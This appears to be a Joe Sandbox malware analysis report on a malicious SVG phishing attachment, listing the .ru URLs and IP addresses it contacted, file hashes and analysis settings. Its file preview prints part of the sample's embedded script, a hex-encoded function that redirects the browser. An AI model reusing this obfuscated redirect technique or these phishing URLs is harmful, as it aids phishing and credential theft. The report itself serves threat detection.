                                                  https://iy8se.zvptaird.ru/gwHj3OKkOhv2tq5VLatsgOER8pOzdGx6oYQYV6RpAhW6P7Tyxefalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://iy8se.zvptaird.ru/ije3pOU4IZXELEnJ9SQsl7KHlYZLa5jNXqd5ay3wmnqGiK0OQGKe8QplOobs12210false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://iy8se.zvptaird.ru/favicon.icofalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://iy8se.zvptaird.ru/34NoRRFidh9TgYIYOlijungyGciExI5Vo0y89105false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://iy8se.zvptaird.ru/qrTJ6QTdDVljK18vstNu7q6r7efiTXfIl0qyGiNa8NrQZ45139false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://214w.hxnywi.ru/jawari!upw23false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://get.geojs.io/v1/ip/geo.jsonfalse
                                                    high
                                                    https://a.nel.cloudflare.com/report/v4?s=w%2B8qvnHDAflmwziWmRnhTJLq6UqCQogBmNIryRLNDoczCCNlxUgV%2BkzOeW%2F73btqLTFHMMxshs0IZ5nHUlOC65Q8JGWXAU3Tr4rc340lgEd4FhG%2BwhVigG671Itdfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://iy8se.zvptaird.ru/xyh5D7hAQpqM0g4ef30false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://iy8se.zvptaird.ru/qrbzLihqqHn3mripsOT5Db20HBuvasjMFehCA0C8VtI0S6ypeD5YyJPwTcd237false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://iy8se.zvptaird.ru/wxv83bmfFs993ZebAr6zux5SnJKV0rVR7L7ElmnyAXnB9Hd7rV1iW6Juab179false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    104.21.48.1
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    172.67.149.248
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    18.164.124.91
                                                    d19d360lklgih4.cloudfront.netUnited States
                                                    3MIT-GATEWAYSUSfalse
                                                    140.82.113.3
                                                    github.comUnited States
                                                    36459GITHUBUSfalse
                                                    1.1.1.1
                                                    unknownAustralia
                                                    13335CLOUDFLARENETUSfalse
                                                    142.250.80.100
                                                    www.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    142.251.40.227
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    104.21.29.234
                                                    214w.hxnywi.ruUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    142.251.32.99
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    142.251.40.234
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    151.101.130.137
                                                    code.jquery.comUnited States
                                                    54113FASTLYUSfalse
                                                    104.21.112.1
                                                    iy8se.zvptaird.ruUnited States
                                                    13335CLOUDFLARENETUStrue
                                                    142.251.32.110
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    18.164.124.11
                                                    unknownUnited States
                                                    3MIT-GATEWAYSUSfalse
                                                    35.190.80.1
                                                    a.nel.cloudflare.comUnited States
                                                    15169GOOGLEUSfalse
                                                    151.101.194.137
                                                    unknownUnited States
                                                    54113FASTLYUSfalse
                                                    142.250.72.110
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    185.199.110.133
                                                    objects.githubusercontent.comNetherlands
                                                    54113FASTLYUSfalse
                                                    104.17.25.14
                                                    cdnjs.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    172.253.115.84
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    IP
                                                    192.168.2.16
                                                    192.168.2.4
                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1647451
                                                    Start date and time:2025-03-24 21:32:00 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:15
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • EGA enabled
                                                    Analysis Mode:stream
                                                    Analysis stop reason:Timeout
                                                    Sample name:RECIPIENT_DOMAIN_NAME.svg
                                                    Detection:MAL
                                                    Classification:mal100.phis.evad.winSVG@20/0@34/183
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .svg
                                                    • Exclude process from analysis (whitelisted): svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 142.251.32.110, 142.251.32.99, 142.250.72.110, 172.253.115.84, 142.250.176.206, 142.250.65.174, 142.251.41.14
                                                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: iy8se.zvptaird.ru
                                                    No created / dropped files found
                                                    File type:SVG Scalable Vector Graphics image
                                                    Entropy (8bit):5.429596887655976
                                                    TrID:
                                                    • Scalable Vector Graphics (18501/1) 78.71%
                                                    • Generic XML (ASCII) (5005/1) 21.29%
                                                    File name:RECIPIENT_DOMAIN_NAME.svg
                                                    File size:578 bytes
                                                    MD5:3358707fb8c23df0f94340e55f4adbbf
                                                    SHA1:7a9ee94f6ea33b5a08a278d102137dd9b516fde2
                                                    SHA256:59b120281e5c3d6f0fe25e70ae38e9bb3f116ced8cfddb1dd5667e33e447f4c4
                                                    SHA512:7045f35c78fd0fc55a8b2771bcd265b11f88e8307db92492649639260d16c84ab3892b0abaea25957f8a14fe0fa5ecdfc1c5b0ba21fcbe69263e939890e4e04f
                                                    SSDEEP:12:TMHdtkOoVq4CutQ0Xbjy3GSfMownS9ZXi6xpG5VEgJHt1MU:2dtkOoVq2tJXq/MoqS9M48QI7MU
                                                    TLSH:30F0E1B1D982ACB062609B744774A97D3D1BE0154F9040F4CDC824031C74EE5A9C1EFC
                                                    File Content Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<svg xmlns="http://www.w3.org/2000/svg" width="400" height="250">..<script>..<![CDATA[..cUVpB = "#Mtroy.tiegs@ocsofl.com";..new Function("77696e646f772e6c6f636174696f6e2e68726566203d2061746f622822614
                                                    Icon Hash:173149cccc490307